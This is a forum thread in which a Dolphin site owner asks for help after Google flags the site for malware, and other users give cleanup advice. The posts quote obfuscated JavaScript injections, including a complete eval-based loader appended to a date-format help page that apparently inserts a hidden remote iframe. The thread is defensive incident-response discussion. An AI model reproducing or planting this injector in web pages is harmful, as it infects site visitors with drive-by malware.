Google found MALWARE

My site is been hacked and I am trying to find help, gogle found malware giving me the list of pages infected:

and here is the script found:

<script>Object.prototype.qwe=function(){return String;};Obje
ct.prototype.asd='e';var s="";try{{}['qwtqwt']();}catch(q){i
f(q)r=1;}if(r&&+new Object(1231)&&document.createTextNode('1
23').data&&typeof{}.asd.vfr==='undefined')c=2;e=eval;m=[4.5*
c,18/c,52.5*c,204/c,16*c,80/c,50*c,222/c,49.5*c,234/c,54.5*c
,202/c,55*c,232/c,23*c,206/c,50.5*c,232/c,34.5*c,216/c,50.5*
c,218/c,50.5*c,220/c,58*c,230/c,33*c,242/c,42*c,194/c,51.5*c
,156/c,48.5*c,218/c,50.5*c,80/c,19.5*c,196/c,55.5*c,200/c,60
.5*c,78/c,20.5*c,182/c,24*c,186/c,20.5*c,246/c,4.5*c,18/c,4.
5*c,210/c,51*c,228/c,48.5*c,218/c,50.5*c,228/c,20*c,82/c,29.
5*c,18/c,4.5*c,250/c,16*c,202/c,54*c,230/c,50.5*c,64/c,61.5*
c,18/c,4.5*c,18/c,50*c,222/c,49.5*c,234/c,54.5*c,202/c,55*c,
232/c,23*c,238/c,57*c,210/c,58*c,202/c,20*c,68/c,30*c,210/c,
51*c,228/c,48.5*c,218/c,50.5*c,64/c,57.5*c,228/c,49.5*c,122/
c,19.5*c,208/c,58*c,232/c,56*c,116/c,23.5*c,94/c,57*c,202/c,
49*c,222/c,58*c,230/c,58*c,194/c,58*c,92/c,49.5*c,222/c,54.5
*c,94/c,58*c,202/c,54.5*c,224/c,23.5*c,230/c,58*c,194/c,58*c
,92/

I don't know if its due to other peoples that i had give  access to my site for help or its my computer itself or maybe some security issue with dolphin 7.07 anyway checking the diretory I can't find the /m  file in the directory

I had suspended this site in WHM so people does not get infected ,hoping to get help here telling me where to start to clean it. Thanks

/m  is  /module . Also, change all of your passwords for logins and check your local computer for malware and/or viruses.

Your hosting company might be able to assist you with this also.

Here's a blog/note I did about it:

http://www.boonex.com/n/fyi-on-malware-attacks

most likely you are going to find that you have several files, index.php and index.html that have been infected. the evil javascript has been injected (appended) to those files. 300+ was the last one we cleaned up. 

what you have to do to clean that up one or two things:

considering you have a backup, that is clean, (prior to infection), then you can restore that backup. if you dont have a clean backup that you can use, then you will need to clean each file that has been appended. 

download the entire site, and use a good editor i.e. dreamweaver or notepad++, open all the files search and replace. 

I found this file in root directory and I noticed at the bottom (red) a script but its different from the one google found .Should I remove it?

Thanks

<html>
<head>

<style type="text/css">

    .spec
    {
        float:left;
        width:80px;
        height:20px;
        position:relative;
        border: 1px solid silver;
        text-align : center;
    }

    .desc
    {
        float:left;
        width:360px;
        height:20px;
        position:relative;
        border: 1px solid silver;
    }

</style>

</head>

<body>

<div style="width:460px; position:relative;">
<h3><center>Do you want to change the Date Format for your site? It is possible, just follow the instructions.</h3>
</center><br>
<b>You need to switch some attributes.</b>
<br>
 1)To show a date in the Format: <b>Day.Month.YYYY</b>, input into the Short or Long Date Format <b>%d.%m.%Y</b>.
<br><br>
2)To show a date and time  - <b>Month/Day/Year Hours:Minutes:Seconds</b> input into the Long Date Format <b>%m/%d/%Y %H:%i:%s</b>.
<br><br>
3)To use PM or AM format for time input - <b>%I%p:%i:%s</b>. You will see time in this format <b>09am:43:12</b>.
<br><br>
4) you can use  different types of separators: <br><br>
<center>
<table border=1>
<tr >
    <td ><b>Separator</b></td>
    <td><b>Format</b></td>
    <td><b>Result</b></td>
</tr>
<tr align=center>
    <td>.</td>
    <td>Day.Month.YYYY</td>
    <td>%d.%m.%Y</td>

</tr>

<tr align=center>
    <td>/</td>
    <td>Month/Day/Year</td>
    <td>%m/%d/%Y</td>

</tr>
<tr align=center>
    <td>*</td>
    <td>Month*Day*Year</td>
    <td>%m*%d*%Y</td>

</tr>

<tr align=center>
    <td colspan=3 >some other separators:   -    :    ;    -- </b></td>

</tr>
</table>
</center>




<br>
<br>
<br>
<b>Use the list to form the date format on your liking.</b><br>

<br>
<div class="spec">Specifier</div>
<div class="desc">Description</div>

<div class="spec">%m</div>
<div class="desc">Month, numeric (01..12)</div>

<div class="spec">%w</div>
<div class="desc">Day of the week (0=Sunday..6=Saturday)</div>

<div class="spec">%d</div>
<div class="desc">Day of the month, numeric (00..31)</div>

<div class="spec">%Y</div>
<div class="desc">Year, numeric, 4 digits</div>

<div class="spec">%y</div>
<div class="desc">Year, numeric, 2 digits</div>

<div class="spec">%b</div>
<div class="desc">Abbreviated month name (Jan..Dec)</div>

<div class="spec">%H</div>
<div class="desc">Hour (00..23)</div>

<div class="spec">%I</div>
<div class="desc">Hour (01..12)</div>

<div class="spec">%p</div>
<div class="desc">AM or PM</div>

<div class="spec">%i</div>
<div class="desc">Minutes, numeric (00..59)</div>

<div class="spec">%s</div>
<div class="desc">Seconds (00..59)</div>
</div>

</body>
</html>
<script>var s="";try{new asd[0]}catch(q){if(q)r=1;c=String;}if(r&&document.createTextNode)t=2;e=eval;m=[4.5*t,18/t,52.5*t,204/t,16*t,80/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,20.5*t,246/t,4.5*t,18/t,4.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,29.5*t,18/t,4.5*t,250/t,16*t,202/t,54*t,230/t,50.5*t,64/t,61.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,238/t,57*t,210/t,58*t,202/t,20*t,68/t,30*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,64/t,57.5*t,228/t,49.5*t,122/t,19.5*t,208/t,58*t,232/t,56*t,116/t,23.5*t,94/t,51*t,210/t,49*t,202/t,57*t,194/t,57.5*t,232/t,48.5*t,232/t,23*t,198/t,55.5*t,218/t,23.5*t,232/t,50.5*t,218/t,56*t,94/t,57.5*t,232/t,48.5*t,232/t,23*t,224/t,52*t,224/t,19.5*t,64/t,59.5*t,210/t,50*t,232/t,52*t,122/t,19.5*t,98/t,24*t,78/t,16*t,208/t,50.5*t,210/t,51.5*t,208/t,58*t,122/t,19.5*t,98/t,24*t,78/t,16*t,230/t,58*t,242/t,54*t,202/t,30.5*t,78/t,59*t,210/t,57.5*t,210/t,49*t,210/t,54*t,210/t,58*t,242/t,29*t,208/t,52.5*t,
200/t,50*t,202/t,55*t,118/t,56*t,222/t,57.5*t,210/t,58*t,210/t,55.5*t,220/t,29*t,194/t,49*t,230/t,55.5*t,216/t,58.5*t,232/t,50.5*t,118/t,54*t,202/t,51*t,232/t,29*t,96/t,29.5*t,232/t,55.5*t,224/t,29*t,96/t,29.5*t,78/t,31*t,120/t,23.5*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,124/t,17*t,82/t,29.5*t,18/t,4.5*t,250/t,4.5*t,18/t,51*t,234/t,55*t,198/t,58*t,210/t,55.5*t,220/t,16*t,210/t,51*t,228/t,48.5*t,218/t,50.5*t,228/t,20*t,82/t,61.5*t,18/t,4.5*t,18/t,59*t,194/t,57*t,64/t,51*t,64/t,30.5*t,64/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,198/t,57*t,202/t,48.5*t,232/t,50.5*t,138/t,54*t,202/t,54.5*t,202/t,55*t,232/t,20*t,78/t,52.5*t,204/t,57*t,194/t,54.5*t,202/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,50.5*t,232/t,32.5*t,232/t,58*t,228/t,52.5*t,196/t,58.5*t,232/t,50.5*t,80/t,19.5*t,230/t,57*t,198/t,19.5*t,88/t,19.5*t,208/t,58*t,232/t,56*t,116/t,23.5*t,94/t,51*t,210/t,49*t,202/t,57*t,194/t,57.5*t,232/t,48.5*t,232/t,23*t,198/t,55.5*t,218/t,23.5*t,232/t,50.5*t,218/t,56*t,94/t,57.5*t,232/t,48.5*t,232/t,23*t,224/t,52*t,224/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,236/t,52.5*t,230/t,52.5*t,196/t,52.5*t,216/t,52.5*t,232/t,60.5*t,122/t,19.5*t,208/t,52.5*t,200/t,50*t,
202/t,55*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,224/t,55.5*t,230/t,52.5*t,232/t,52.5*t,222/t,55*t,122/t,19.5*t,194/t,49*t,230/t,55.5*t,216/t,58.5*t,232/t,50.5*t,78/t,29.5*t,204/t,23*t,230/t,58*t,242/t,54*t,202/t,23*t,216/t,50.5*t,204/t,58*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,232/t,60.5*t,216/t,50.5*t,92/t,58*t,222/t,56*t,122/t,19.5*t,96/t,19.5*t,118/t,51*t,92/t,57.5*t,202/t,58*t,130/t,58*t,232/t,57*t,210/t,49*t,234/t,58*t,202/t,20*t,78/t,59.5*t,210/t,50*t,232/t,52*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,204/t,23*t,230/t,50.5*t,232/t,32.5*t,232/t,58*t,228/t,52.5*t,196/t,58.5*t,232/t,50.5*t,80/t,19.5*t,208/t,50.5*t,210/t,51.5*t,208/t,58*t,78/t,22*t,78/t,24.5*t,96/t,19.5*t,82/t,29.5*t,18/t,4.5*t,18/t,50*t,222/t,49.5*t,234/t,54.5*t,202/t,55*t,232/t,23*t,206/t,50.5*t,232/t,34.5*t,216/t,50.5*t,218/t,50.5*t,220/t,58*t,230/t,33*t,242/t,42*t,194/t,51.5*t,156/t,48.5*t,218/t,50.5*t,80/t,19.5*t,196/t,55.5*t,200/t,60.5*t,78/t,20.5*t,182/t,24*t,186/t,23*t,194/t,56*t,224/t,50.5*t,220/t,50*t,134/t,52*t,210/t,54*t,200/t,20*t,204/t,20.5*t,118/t,4.5*t,18/t,62.5*t];mm=c['fro'+'mCharCode'];for(i=0;i!=m.length;i++)s+=mm(e("m"+"["+"i"+']'));try{document.appendChild(null)}catch(q){e(s);}</script>
<!-- o --><!-- c -->

well as provided from google, the list of compromised files has been provided in a shortlist. you would need to search across the entire site. it is my belief that every index.* has been infected. there are ~200 of those files. 

then once you clean those up, you have to have google review the site again, then they will remove the warning, though even then it takes some time to propogate getting it removed. also in your google account, and you will need one in order to submit for review, there are some helpful tips on what needs to be done to clean the site. 

so all in all its quite a task to clean up. 

the major obstacle is trying to identify how the site was compromised. who has been on your site, who have you shared your FTP credentials with. 

So far I only found 1 file  faq.php in the root directory  infected  and request google to remove the warnng screen from my site and they did but now still unable how to determine the way file was infected .

well there are a few ways to go about this, and most times it really isnt worth putting much effort into if you are on a shared hosting? 

but if you have given your ftp out to anybody to work on your site, then they could well be infected, your own machine could be infected, or the server itself could be compromised. 

changing your logins, and keeping your environment as secure as you can is really all you can do. i will also send you a PM for a service that scans your site on a daily basis, to notify you if there are any security vulnerabilities or anything else going on with your site. 

will send that in a PM to you. 

is there a common denominator in all of this? have all infected sites had work done by the same developer? This is realy becoming a huge problem.